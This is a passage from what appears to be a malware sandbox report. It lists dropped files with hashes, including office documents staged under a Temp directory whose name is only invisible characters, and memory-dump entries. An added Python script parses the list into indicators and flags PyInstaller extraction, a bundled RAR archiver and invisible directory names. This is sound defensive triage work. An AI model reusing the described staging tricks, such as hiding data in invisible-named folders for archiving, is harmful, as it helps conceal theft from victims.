  SHA512    9af133a0f9accce44abdfa06ba056c37d9ea6942d37b284002265aa13590ae64db8e32b3c737cd490b2e8aa92383da97f7760d1e7b9dfb195e4ed433cc22052c

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Desktop\UnprotectGroup.xlsx
  Filesize  10KB
  MD5       24fcaca2f89cd81f86327b1e3f1f2e91
  SHA1      aa2979694b3071e526c3809ea3e0cec7deabe9b7
  SHA256    b2dce9e57d7ebd976d7d6ec703db4453e68c658beb1442aa83b4e2ed0b3dc687
  SHA512    15edd442754ff3a91f6b8b4b4657eba2c66aea8b0ab6a4f630cc70cde708f2b7da431678d4bd245daa7ff2a7f6975e999ce3f0cf5ae37a6be9d6ec3b8b454a71

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\ApproveComplete.xlsx
  Filesize  10KB
  MD5       3ffb016271e4e73df3b895ebc7406fb6
  SHA1      116fb0aabe041e386ef07b33681173a4170a9f1b
  SHA256    a57da50c6ff3023e8048d95311df44eeefd51e75743fb48d29b42f637dd5d887
  SHA512    ab5a4692a2719db7b070b72d67f36a591f762f1c14b136ef4fdd59157fcd847202aa34d857ce269a8ee72ed38be969067a2228e2485b1089f4daf4c2d06ae65c

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\CloseComplete.pdf
  Filesize  660KB
  MD5       bb9c325118245cad99b7c0df1a8e9134
  SHA1      2f6221c762f7911c7b1db816e6a1d00f1553a60d
  SHA256    4649a341a580f5b450c9404ca1fa329b13b30d45bcd5269fe0b3a7df1a16a28b
  SHA512    836fb256b1f351b8a21ba20e3cc67dc020813e297190a664c35b434e0eefd0775e22f0638d94cc8cbbbd33831b3020b942aee5714f2c46925046c4f223667f46

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\ConfirmPush.csv
  Filesize  675KB
  MD5       df3bd3c05545e8a952e476d6b85be1cd
  SHA1      3d9327da7da83889ce1dbd664a7357696f13bbe2
  SHA256    5713d9533ed8348e4aa80605e2bc5f12480166fa37079256bb701474ebe422b9
  SHA512    cf0903e7ba028884b2d311b295f591f6ec77f242702b1f68f5ca4643bb1b4b750f5030fb4c8bf5fee750f05b0499931e0840ff6ced09fff3e8c002d3da98aaf4

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\OutConvertTo.docx
  Filesize  16KB
  MD5       39a1016b3d76bc1726f450298de9a228
  SHA1      7c7c6d359c43e3ae4577a58751039539fdfc4da5
  SHA256    ab042ec274acad77d45ae7b25b9836c35f4afb7198cfcbf913a28249c0410878
  SHA512    1cfabcd14b2f4ac97143dfce142dd7b09efc19a7eb2a782c07a54e2ec33a0f1719086d628640f7a37f8a0c06c0b9cb123c71825688adeadbf7a70498be99ccdd

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\ReceivePublish.xlsx
  Filesize  12KB
  MD5       42019febb3b1fc6b1507c59da5106f79
  SHA1      5699d3e8a6bbb63e92438c36b1b424bd297b5ee1
  SHA256    8e22a7143118b14e2339eaed2c74ba521ecd7009d1c5abcdb18658eac089c31c
  SHA512    fad730a245cb0260eebdeb4961254b29b3c105169f463d120c506097f09413360e6dec9b9e475abc0074421a36109e9d31bb1a49cbae3f9cdac54e1101cf4cda

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\SendComplete.xlsx
  Filesize  12KB
  MD5       94c8c41a9bf0513ae28b57080b1e3ebe
  SHA1      d4bd482c058b2d96021e8b565da3b67dbb6d50ba
  SHA256    1b7d7c0be66419de107761a3f8738711fe38fc4ba13fbad0d08b515de562cb4e
  SHA512    f1f77c13312a051c46b3e745bc26880c7629f385d41fe160246d8973b2a7710c216a4c6d46492011540a61614732be3568b49c82a21ccbce757500e185efbe19

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\SuspendPush.csv
  Filesize  420KB
  MD5       aa92f0762218b6f1ce22747ff8c8d914
  SHA1      88da3c0ca4fa216a74bf87f9a00dca0fe759b96b
  SHA256    fa4923a1b05c08bd1942e61281df4c595f897ffb115a6035f731ffda461927e5
  SHA512    5e96a288c75d13916bddb0d43c60123ce93eacc561f4ac84469299e58077a540b1121e80b6b7a73efecbbc14d5465e453e8374b334b513cef67e3bbd35272fca

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\UndoReset.xlsx
  Filesize  12KB
  MD5       002ad893c2d3ffcf1ed4e0736b2c152b
  SHA1      3afc3a4a8cb3e619f333767158171b5507a494cf
  SHA256    886fee7dfe581bd48576714d191f5915adfb12aeb9775388c9583584e48bdd17
  SHA512    e0bd5003ca30ec1090779ef78cab3ac1a1e5c333fe2c94d39f37f46b5277f19e871b963c0dfa6e8162f4040242e097a80a3794a80c78acf2e8c09a07f7ae93c9

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\UndoUnblock.txt
  Filesize  735KB
  MD5       ac21ab6fe5e8cac6a4de084fabe90240
  SHA1      d5c9e3261ba40b062c8b723386de1ba6c532115d
  SHA256    eaebdc2bac1977be0d38061e7ae0a36ed3df40f5dc800d4f5440cdb2a0ee18f8
  SHA512    3d533ed7dcd99b3b925ff4cb5ef23ef902e3721fc38e4d011bf67cb69f253c306ff56927b71632ccf08d90d485c282d65b289cb488ecf9b1c5e5eb6003d62f7c

• C:\Users\Admin\AppData\Local\Temp\‏    ‏   ​\Common Files\Documents\UseRegister.doc
  Filesize  765KB
  MD5       743bdc3b3ca771a2324f46eacd99cbd3
  SHA1      b388194378feff22813a410336645d14b4082ac3
  SHA256    8291a75bf6c5439493a5b06150c5e73a89006a80752c43def1172f90b5e6c9c2
  SHA512    449631e5b81fe96eb0b62196a83eb96edd0051826102c2ae0c1126112b65cd0915b7d2638ac8cd158c3e03b979ffb1b2bdc5b93842edcc4d17268f6f87cf08cd

• \??\c:\Users\Admin\AppData\Local\Temp\shxawplp\CSC52F051DC57D044238AFC433D880C45C.TMP
  Filesize  652B
  MD5       da739f20d6db8950fb9df9a7bf8418e5
  SHA1      7a664674711662b4ca3626f22768582ba4b33f8a
  SHA256    5e2c9580958048aaa0d9642aabad79cb2dff264274eed207e567c86eeca308e3
  SHA512    f3a0c79b8148532bf111d5132946a4a7dc8591121f4977dfbb5231889b9beadbf92e4d78fe1da8ac26b064a7b283852ef48e725439d36d6ef426812785b940a6

• \??\c:\Users\Admin\AppData\Local\Temp\shxawplp\shxawplp.0.cs
  Filesize  1004B
  MD5       c76055a0388b713a1eabe16130684dc3
  SHA1      ee11e84cf41d8a43340f7102e17660072906c402
  SHA256    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
  SHA512    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

• \??\c:\Users\Admin\AppData\Local\Temp\shxawplp\shxawplp.cmdline
  Filesize  607B
  MD5       c6c24fd72e1567983993886a3336d899
  SHA1      f51148802db341cb7ddc90773ac9a9c7cd73440d
  SHA256    853f7586e830ba68b34953f591349d5ec217dcc9218af8c3c96c6f8f98abb98c
  SHA512    5ee6888a37795923d80adf14d7c7c541c0e5ada99f9bad0b6c1391d89112cf802be251e83174158542f0e3acbc1f8823ceb6ed20ab1b40a47c2b3a53eb8f8c42
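
The inventory above is the report's raw dropped-file list. What a responder usually wants from it is a machine-readable hash set and a short list of which drops deserve a second look: the `_MEI32122` directory (a PyInstaller one-file extraction, consistent with the bundled `python313.dll` and `.pyd` files), the `rar.exe` shipped with a `rarreg.key` beside it, and a directory under `Temp` whose name consists only of invisible characters (right-to-left marks and a zero-width space) with `Common Files\Desktop` and `Common Files\Documents` subfolders full of office documents. The Python below is an added example and not part of the sandbox output. It parses the label/value layout both as laid out on this page and as exported with each label and its value on separate lines, checks that every hash is well-formed hex of the right length, and flags the three patterns named above. The two sample records are copied from this page; the exact code points of the invisible directory name (U+200F and U+200B) and the flag names are assumptions of this example.

```python
"""Parse this report's 'dropped files' listing into IOC records, check that the
hashes are well formed, and flag artifacts worth a second look.
Added example, not part of the sandbox output."""
from __future__ import annotations
import re
import unicodedata
from dataclasses import dataclass, field

LABEL = r"(Filesize|MD5|SHA1|SHA256|SHA512)"
HEX_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}

# Two entries constructed from this page. The directory name made of invisible
# characters is reconstructed with ASSUMED code points (U+200F RLM, U+200B ZWSP).
INVIS_DIR = "\u200f    \u200f   \u200b"
SAMPLE = r"""
• C:\Users\Admin\AppData\Local\Temp\_MEI32122\rarreg.key
  Filesize  456B
  MD5       4531984cad7dacf24c086830068c4abe
  SHA1      fa7c8c46677af01a83cf652ef30ba39b2aae14c3
  SHA256    58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
  SHA512    00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
• C:\Users\Admin\AppData\Local\Temp\{INVIS}\Common Files\Desktop\FindPing.xlsx
  Filesize  14KB
  MD5       1ca6714a94be45f87b57980e76100792
  SHA1      843c1604ccc5a9a087fff59900e1396bc6d6ff5c
  SHA256    1b6ed84c6191b8c6e313247f955337d5299b5f4db0c1a663482fa33e9a46e470
  SHA512    65793f6bdc37517706b971c70957ee964d2d45138ebb81990f34f2105d3e3de6ecdd4877f578ec307636c6890a6e8a80024191483d93a6275056989e623c2157
""".replace("{INVIS}", INVIS_DIR)
# The raw export puts each label and its value on separate lines; derive that
# layout from SAMPLE so both layouts can be exercised.
SPLIT_SAMPLE = re.sub(rf"^([ \t]*){LABEL}[ \t]+", r"\1\2\n\1", SAMPLE, flags=re.M)


@dataclass
class Dropped:
    path: str
    filesize: str = ""
    md5: str = ""
    sha1: str = ""
    sha256: str = ""
    sha512: str = ""
    flags: list[str] = field(default_factory=list)


def has_invisible_component(path: str) -> bool:
    """True if a path component is all whitespace or contains a Unicode format
    character (category Cf: RLM, ZWSP, BOM, ...), i.e. renders as blank."""
    return any(p and (p.isspace() or any(unicodedata.category(c) == "Cf" for c in p))
               for p in path.split("\\"))


def triage_flags(path: str) -> list[str]:
    """Heuristics for this sample; the flag names are this example's own."""
    flags = []
    if re.search(r"\\_MEI\d+\\", path):            # PyInstaller one-file temp dir
        flags.append("pyinstaller-extract")
    if path.rsplit("\\", 1)[-1].lower() in ("rar.exe", "rarreg.key"):
        flags.append("bundled-rar")                  # archiver shipped in the sample
    if has_invisible_component(path):
        flags.append("invisible-dirname")
    return flags


def parse_dropped(text: str) -> list[Dropped]:
    """A bullet opens a record. A label followed by a value on the same line sets
    the field; a bare label takes its value from the next non-empty line."""
    records: list[Dropped] = []
    pending = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.fullmatch(rf"{LABEL}\s*(\S*)", line)
        if line.startswith("•"):
            records.append(Dropped(path=line[1:].strip()))
            pending = None
        elif m and records:
            pending = m.group(1).lower()
            if m.group(2):
                setattr(records[-1], pending, m.group(2))
                pending = None
        elif pending and records:
            setattr(records[-1], pending, line)
            pending = None
    for rec in records:
        rec.flags = triage_flags(rec.path)
    return records


def validate(records: list[Dropped]) -> list[str]:
    """Hashes must be lowercase hex of the algorithm's digest length."""
    return [f"{r.path}: bad {algo} {getattr(r, algo)!r}"
            for r in records for algo, n in HEX_LEN.items()
            if not re.fullmatch(rf"[0-9a-f]{{{n}}}", getattr(r, algo))]


def ioc_hashes(records: list[Dropped], algo: str = "sha256") -> set[str]:
    return {getattr(r, algo) for r in records if getattr(r, algo)}
```

Printing `ascii(rec.path)` for a record carrying `invisible-dirname` shows the `\u200f` and `\u200b` escapes that a plain directory listing hides, which is the quickest way to confirm the staging path during triage. `SPLIT_SAMPLE` exists only to show that the parser also accepts the one-field-per-line export; `validate` catches truncated or mis-copied digests before they reach a blocklist.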

• memory/1976-224-0x000001A6A3190000-0x000001A6A3198000-memory.dmp
  Filesize  32KB

• memory/3432-86-0x0000027ED8F50000-0x0000027ED8F72000-memory.dmp
  Filesize  136KB

• memory/4088-64-0x00007FFDFF7B0000-0x00007FFDFF7BD000-memory.dmp
  Filesize  52KB

• memory/4088-81-0x00007FFDF6FF0000-0x00007FFDF701B000-memory.dmp
  Filesize  172KB

• memory/4088-60-0x00007FFDF6760000-0x00007FFDF68DF000-memory.dmp
  Filesize  1.5MB

• memory/4088-58-0x00007FFDF6ED0000-0x00007FFDF6EF5000-memory.dmp
  Filesize  148KB

• memory/4088-56-0x00007FFDFCC90000-0x00007FFDFCCA9000-memory.dmp
  Filesize  100KB

• memory/4088-54-0x00007FFDF6FF0000-0x00007FFDF701B000-memory.dmp
  Filesize  172KB

• memory/4088-30-0x00007FFDF7020000-0x00007FFDF7047000-memory.dmp
  Filesize  156KB

• memory/4088-264-0x00007FFDFF7B0000-0x00007FFDFF7BD000-memory.dmp
  Filesize  52KB

• memory/4088-268-0x00007FFDF6E90000-0x00007FFDF6EC4000-memory.dmp
  Filesize  208KB

• memory/4088-48-0x00007FFE00450000-0x00007FFE0045F000-memory.dmp
  Filesize  60KB

• memory/4088-25-0x00007FFDE7850000-0x00007FFDE7EB3000-memory.dmp
  Filesize  6.4MB

• memory/4088-209-0x00007FFDF6760000-0x00007FFDF68DF000-memory.dmp
  Filesize  1.5MB

• memory/4088-105-0x00007FFDF6ED0000-0x00007FFDF6EF5000-memory.dmp
  Filesize  148KB

• memory/4088-66-0x00007FFDF6E90000-0x00007FFDF6EC4000-memory.dmp
  Filesize  208KB

• memory/4088-76-0x00007FFDF6FD0000-0x00007FFDF6FE4000-memory.dmp
  Filesize  80KB

• memory/4088-62-0x00007FFDF73B0000-0x00007FFDF73C9000-memory.dmp
  Filesize  100KB

• memory/4088-82-0x00007FFDFB850000-0x00007FFDFB85D000-memory.dmp
  Filesize  52KB

• memory/4088-84-0x00007FFDFCC90000-0x00007FFDFCCA9000-memory.dmp
  Filesize  100KB

• memory/4088-85-0x00007FFDF65D0000-0x00007FFDF6683000-memory.dmp
  Filesize  716KB

• memory/4088-73-0x00007FFDE7310000-0x00007FFDE7843000-memory.dmp
  Filesize  5.2MB

• memory/4088-74-0x00007FFDF7020000-0x00007FFDF7047000-memory.dmp
  Filesize  156KB

• memory/4088-72-0x0000013937F00000-0x0000013938433000-memory.dmp
  Filesize  5.2MB

• memory/4088-70-0x00007FFDE7850000-0x00007FFDE7EB3000-memory.dmp
  Filesize  6.4MB

• memory/4088-71-0x00007FFDF6690000-0x00007FFDF675E000-memory.dmp
  Filesize  824KB

• memory/4088-285-0x00007FFDF6690000-0x00007FFDF675E000-memory.dmp
  Filesize  824KB

• memory/4088-286-0x0000013937F00000-0x0000013938433000-memory.dmp
  Filesize  5.2MB

• memory/4088-287-0x00007FFDE7310000-0x00007FFDE7843000-memory.dmp
  Filesize  5.2MB

• memory/4088-314-0x00007FFDF6760000-0x00007FFDF68DF000-memory.dmp
  Filesize  1.5MB

• memory/4088-308-0x00007FFDE7850000-0x00007FFDE7EB3000-memory.dmp
  Filesize  6.4MB